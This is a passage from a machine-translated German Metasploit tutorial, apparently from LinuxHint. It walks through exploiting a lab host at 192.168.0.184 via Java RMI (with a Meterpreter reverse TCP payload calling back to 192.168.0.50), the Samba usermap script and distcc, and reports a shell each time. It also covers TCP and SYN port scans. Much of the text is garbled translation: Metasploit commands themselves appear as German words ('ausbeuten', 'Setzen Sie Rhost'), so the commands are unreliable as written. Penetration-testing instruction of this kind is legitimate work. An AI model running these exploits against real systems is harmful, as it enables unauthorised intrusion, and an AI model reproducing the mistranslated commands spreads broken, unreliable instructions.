
# ausbeuten

Und wie Sie wieder sehen können, haben wir eine Shell -Sitzung innerhalb des Ziels.

Verwenden von Metasploit, um Java Bösartigen Code auszuführen:

# Verwenden Sie exploit/multi/misc/java_rmi_server
# Optionen anzeigen
# Setzen Sie Rhost 192.168.0.184
# Nutzlasten anzeigen
# Setzen Sie Payload Java/MeterPreter/Reverse_TCP
# Set lhost 192.168.0.50
# ausbeuten

Verwenden Sie Metasploit, um die Anfälligkeit von Samba UsMap -Skript zu hacken:

Einige Schritte wie Exploits -Suche werden weggelassen, um ein riesiges Tutorial zu vermeiden. Um diesen Verwundbarkeitslauf auszunutzen:

# Verwenden Sie exploit/multi/samba/usermap_script
# Optionen anzeigen

Legen Sie das Ziel -IP ein und nutzen Sie sie, indem Sie ausführen:

# Setzen Sie Rhost 192.168.0.184
# ausbeuten

Wie Sie sehen können, haben wir eine Hülle in unser Ziel gewonnen.

Verwenden von Metasploit, um die Befehlsausführung von Distcc -Daemon zu nutzen:

Diese Verwundbarkeit wird hier erklärt.

Run beginnen:

# Verwenden Sie exploit/unix/misc/distcc_exec

Dann renne:

# Setzen Sie Rhost 192.168.0.184
# ausbeuten

Wie Sie sehen können, haben wir wieder Zugang zum Ziel erhalten.

Verwenden von Metasploit für den Port -Scan (zusätzlicher Weg ohne NMAP):

Durchführen eines TCP -Scans mit Metasploit:

Um einen anderen Scan auszuführen, ohne NMAP Metasploit zu verwenden, bietet Sie Alterntiven an, die Sie durch Laufen finden können:

# Suchsportscan

Um einen TCP -Scan -Lauf durchzuführen:

# Verwenden Sie Scanner/Portscan/TCP
# Setzen Sie Rhost 192.168.0.184

Weitere Optionen sehen:

# Optionen anzeigen

Wählen Sie den Portbereich aus, den Sie durch Ausführen scannen möchten:

# Setzen Sie die Ports 21-35

Führen Sie dann den Scan durch Ausführung aus:

# laufen

Wie Sie sehen können, wurden Häfen 22,25,23 und 21 offen gefunden.

Durchführen eines SYN -Scans mit Metasploit:

Für einen Syn -Scan -Lauf:

# Verwenden Sie Auxiliary/Scanner/Portscan/Syn
# Setzen Sie Rhost 192.168.0.184
# Setzen Sie die Ports 80
# laufen

Wie Sie sehen können, wurde Port 80 offen gefunden.

ABSCHLUSS

Metasploit ist wie ein Schweizer Armeemesser, es hat so viele Funktionen. Ich hoffe, Sie haben dieses Tutorial gefunden, kein Metasploit nützlich. Folgen Sie LinuxHint weiter, um weitere Tipps und Updates unter Linux und Networking zu erhalten.